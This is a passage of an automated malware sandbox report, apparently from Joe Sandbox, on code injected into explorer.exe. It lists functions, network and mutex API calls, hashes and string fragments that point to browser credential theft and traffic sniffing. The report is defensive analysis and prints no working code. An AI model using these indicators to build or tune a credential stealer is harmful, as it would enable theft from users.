User-Agent: , xrefs: 0E5D3935, 0E5D3948
urlmon.dll, xrefs: 0E5D3959
on.d, xrefs: 0E5D3902

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: c192e4299119fc49a5dce016539e9b181f7c1fab37b9beb73fc770a7cf703f2e
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: E231D471614A4D8BCB15EFA8C8847EEB7E4FB98205F400A2AD54ED7240DF748A49C78A

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D38BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E5D39A0

Strings

nt: , xrefs: 0E5D391E
User-Agent: , xrefs: 0E5D3935, 0E5D3948
urlmon.dll, xrefs: 0E5D3959
on.d, xrefs: 0E5D3902

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 76ad1d26c6e499cb804382e41110c66ea4d8a0688c903d9b9777efabc2d9b54a
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 2221E670618A4D8BCF15EFACC8847EE7BE4FF98205F404A1AD55AD7240DF748A49C78A

Uniqueness

Uniqueness Score: -1.00%

Function 0E5CFB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E5CFCCA

Strings

el32, xrefs: 0E5CFBA0
.dll, xrefs: 0E5CFBCD
kern, xrefs: 0E5CFB99

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 4e7219a791e1dce77201bab75e13c09cac2db1d8123913387c6e5ef07a0c44c7
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: A4418D70A18A0C8FCB54EFA8C8947AD77E1FF98300F044A7AC94ADB255DE349945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E5CFB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E5CFCCA

Strings

el32, xrefs: 0E5CFBA0
.dll, xrefs: 0E5CFBCD
kern, xrefs: 0E5CFB99

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 79b7bb86eb0bad09b575e2ecab06d0a43f7217f75899f174cd2e68377b93e1f5
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 23417C70A18A088FCB54EFA8C4957ED77F1FB98300F04497AC94EDB256DE349945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D572E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E5D5791

Strings

ect, xrefs: 0E5D5761
conn, xrefs: 0E5D575A

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 2e7190a0e2acbf5445463185a9e4015525562227a42b973146848ef50ae1d5a9
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: FE015E30618B188FCB94EF5CE088B55B7E0FB58324F1545AED90DCB226C674DC858BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D5732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E5D5791

Strings

ect, xrefs: 0E5D5761
conn, xrefs: 0E5D575A

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: cecdeb2b0e2def80c9c242102c2f061fe90148601486dbfdd26d6307b368d9a0
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 68012170618A1C8FCB94EF5CE048B5577E0FB59314F1545AE990DCB226C674CD858BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D56B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0E5D5713

Strings

send, xrefs: 0E5D56DA

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 195cfcc4242f7c6c897ddf4c01f8cfcbf386630714c82366ac365dcd0778074a
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: F501527051CA088FCB88EF5CD048B2577E0FB58314F1545AED85DCB266C670D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0E5D55B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0E5D5611

Strings

sock, xrefs: 0E5D55D9

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 485a8deb25d0f85b6beb3467c7f18ce093e67f5fd685a5d595ab34ca4657b370
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 32012C70618A188FCB84EF5CE048B54BBE0FB59314F1545AEE85ECB266D7B0C985CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0E5CD2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0E5CD32D

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 10a18e1e937a8dcc4b927e8d10d390165f364d83a77aec0d47f3f1e1143e0cc5
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 82316CB4614B09DEDB64AFA980A82A5F7F0FB54300F444A7EC91DCB106CB749855CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0E5CD412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0E5CD461

Memory Dump Source

Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 2bc6ad2ee620857cf99455f0b2e9b30a0fa8c02a04dfd550f0847c371edabd31
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 22F0FC30268B494FD788EF6CD44563AF3E0FBE8215F45093EA64DC3264DA75C9814716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F438D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

S, xrefs: 0F439073
el32, xrefs: 0F438F27
.dll, xrefs: 0F438F2F
M, xrefs: 0F439082
wini, xrefs: 0F438F72
net., xrefs: 0F438F44
dll, xrefs: 0F438F4C
32.d, xrefs: 0F438F0B
kern, xrefs: 0F438F5A
user, xrefs: 0F438F03
ll, xrefs: 0F438F13

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 660ffb7ccb24fe7aeef512b39315e7cd185ef7276f2fd0bd39192027a865b4b6
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 9DE17B70518F488FD769EF68C4847ABB7E1FB58300F404A2E999BC7241DF74A541CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F43B792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

d, xrefs: 0F43B8F2
encr, xrefs: 0F43B89D
guid, xrefs: 0F43B7CE
encr, xrefs: 0F43B8D2
dPas, xrefs: 0F43B8E2
ypte, xrefs: 0F43B8A5
e, xrefs: 0F43B8BD
Fiel, xrefs: 0F43B884
itUR, xrefs: 0F43B85D
ypte, xrefs: 0F43B8DA
rnam, xrefs: 0F43B8B5
swor, xrefs: 0F43B8EA
user, xrefs: 0F43B876
Subm, xrefs: 0F43B855
dUse, xrefs: 0F43B8AD
form, xrefs: 0F43B84D
name, xrefs: 0F43B87D

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 0eb96f42b71ba9a15f1148ef32383f2b2c36085a5750f8ae449e1b8ebb7fb212
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 81B19D30618B488EDB15EF69C485AEEB7F1FF98300F40461ED89AC7252EF74A505CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0F439622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

t, xrefs: 0F4396C8
d, xrefs: 0F4396CF
2, xrefs: 0F439674
l, xrefs: 0F439682
c, xrefs: 0F439697
l, xrefs: 0F4396D6
i, xrefs: 0F43969E
l, xrefs: 0F4396AC
d, xrefs: 0F4396A5
e, xrefs: 0F43966D
w, xrefs: 0F4396B3
n, xrefs: 0F4396BA
d, xrefs: 0F43967B
u, xrefs: 0F439661
n, xrefs: 0F4396C1
s, xrefs: 0F439689
p, xrefs: 0F439690

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: ef78a39535292e8ba3bd39f431f38789e10eca5af9e81df0b307238ffaa3b896
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 18418C70A18B08CFDB14DF88A4456BE7BE7EB8C700F40025ED849D7386DBB5A9458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0F440AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

c, xrefs: 0F440C0B
l, xrefs: 0F440CE2
[, xrefs: 0F440CCD
[, xrefs: 0F440C2D
], xrefs: 0F440C3D
b, xrefs: 0F440C73
n, xrefs: 0F440C98
[, xrefs: 0F440C66
D, xrefs: 0F440CDA
l, xrefs: 0F440C35
], xrefs: 0F440CA8
[, xrefs: 0F440BF6
e, xrefs: 0F440CA0
[, xrefs: 0F440C90

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 5b7b667170ebfcec849fe08192a45418693b531359e19922958c66189da26d4a
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 7DC19C70218B099FD758EF28D485AEAF3E1FB98304F40472E999AD7201DF74B615CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0F440F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 0F440F98
n, xrefs: 0F440F6B
r, xrefs: 0F440FA0
r, xrefs: 0F440FB0
r, xrefs: 0F440FC0
., xrefs: 0F440F63
r, xrefs: 0F440FB8
r, xrefs: 0F440F88
r, xrefs: 0F440FA8
c, xrefs: 0F440FC8
r, xrefs: 0F440F90
0, xrefs: 0F440F5B

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 1f2d66a085e6aa6124b161860e5af5ed77176a7c3bb1fd9ee129adfc597c7ca9
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 2F51E6701187488FE71ADF18C4852AAB7E5FBC5700F501A2FE8CBD7242DBB4A546CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0F43A2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0F43A629
cli., xrefs: 0F43A327
dll, xrefs: 0F43A32E
nspr, xrefs: 0F43A4D4
sspi, xrefs: 0F43A320
4.dl, xrefs: 0F43A4DB
l, xrefs: 0F43A4E2
dragon_s.dll, xrefs: 0F43A614

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: f6992aa5a7257718913cd2c8bb50999ba116808f2c26944c53dc60cbf9c9230a
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 4FC1C230A18B194FC758EF68D455AAAF3E1FB98300F81432E984AD7252DF34E646CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0F43A2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0F43A629
cli., xrefs: 0F43A327
dll, xrefs: 0F43A32E
nspr, xrefs: 0F43A4D4
sspi, xrefs: 0F43A320
4.dl, xrefs: 0F43A4DB
l, xrefs: 0F43A4E2
dragon_s.dll, xrefs: 0F43A614

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 066a53cbef9426e18b2f725842e38d305ca5d049b3f8b2f34a5e37abb7f24ded
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: FAC1C331A18B194FC758EF68D455AEAF3E1FB98300F81432E884AD7252DF34E646C785

Uniqueness

Uniqueness Score: -1.00%

Function 0F43BCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

Pass, xrefs: 0F43BD97
name, xrefs: 0F43BDB2
L: , xrefs: 0F43BD66
2, xrefs: 0F43BDE1
UR, xrefs: 0F43BD5F
User, xrefs: 0F43BDAB
word, xrefs: 0F43BD9E

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 7a6b980b504b91cc24ba92bafa2452d7a9accb40caa6a60922f48d627f277943
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: F2A19070A187488FDB19EFA8D4447EEB7E1FF88304F40462ED88AD7252EF7495458789

Uniqueness

Uniqueness Score: -1.00%

Function 0F43BCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

Pass, xrefs: 0F43BD97
name, xrefs: 0F43BDB2
L: , xrefs: 0F43BD66
2, xrefs: 0F43BDE1
UR, xrefs: 0F43BD5F
User, xrefs: 0F43BDAB
word, xrefs: 0F43BD9E

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: d904abcf9cf44b430cb333fdd311b2beaee582517c7d363a42ee16f49362239b
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 3C919F70A187488BDB19EFA8D444BEEB7F1FF88304F40462ED88AD7252EF7495458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0F43B352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 0F43B3B0
e, xrefs: 0F43B48E
n, xrefs: 0F43B3E7
, xrefs: 0F43B47C
v, xrefs: 0F43B4A0

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: b22bddf50ebf13deb9cae13672ad8837ec780b101f473db7b8f00042be7541d2
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 62716371A187488FE754EF68C4847AAB7F1FF98304F00062FD84AD7262EF75A9458745

Uniqueness

Uniqueness Score: -1.00%

Function 0F436C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

ole3, xrefs: 0F436C5D
dll, xrefs: 0F436C9E
2.dl, xrefs: 0F436C64
l32., xrefs: 0F436C97
shel, xrefs: 0F436C90

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 0bec5a2846f11adbdb464173894b50c5fe40db205e63f79fac81adf0b11fbeeb
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 3E515DB0918B4C8BDB55EF64D045AEEB7F1FF58300F40462E989AE7214EF70A645CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0F43786F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

4, xrefs: 0F4379E9
dll, xrefs: 0F4378F4
ion., xrefs: 0F4378EC
vers, xrefs: 0F4378E4
\, xrefs: 0F4379E0

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 4aea1237a28d4d0c520be511d13770c58e414d64336c83ff71e4568e89724a1b
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: AC417F3061CB888BDB69EF2498457EB77E4FB98305F40462E989EC7241EF34E645C782

Uniqueness

Uniqueness Score: -1.00%

Function 0F4394B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

32.d, xrefs: 0F4394DA
user, xrefs: 0F4394D3
sspi, xrefs: 0F43950E
cli., xrefs: 0F439515
dll, xrefs: 0F43951C

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 547b6946e4ddbdcc171ec6fc706d975819cce04ac44f7f02fa482e7cea96e594
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 16415C31E18E0D8FDB58EF6880947AE73E2FB5C310F40016AAC0AD7351DA75D9858B86

Uniqueness

Uniqueness Score: -1.00%

Function 0F437432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

h, xrefs: 0F43751F
.dll, xrefs: 0F43753F
el32, xrefs: 0F437537
kern, xrefs: 0F43752A

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 3abd59ef496059d81402f8e85a5d4340c4361d4481e80edf9435d7f2b552baa3
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 844160B0A0CB488FD769DF2984843AAB7E1FB98301F504A6F989AC2666DB70D545CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0F43E0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 0F43E154
om:, xrefs: 0F43E146
, xrefs: 0F43E184
f fr, xrefs: 0F43E13D

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 665caa506bfb6f295856331ec24331cf8d8fe7b1b5f9a9aca74c26f94e5b606f
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 4E31F27150CB885FD71AEF29C0846EAB7D4FB94300F50491EE89BD7252EE34A64ACB43

Uniqueness

Uniqueness Score: -1.00%

Function 0F43E0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 0F43E154
om:, xrefs: 0F43E146
, xrefs: 0F43E184
f fr, xrefs: 0F43E13D

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: f13b6b8061d0ed128d4d0023cbbd2c65d0e6dd030e05022f69580e3ee69149f5
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
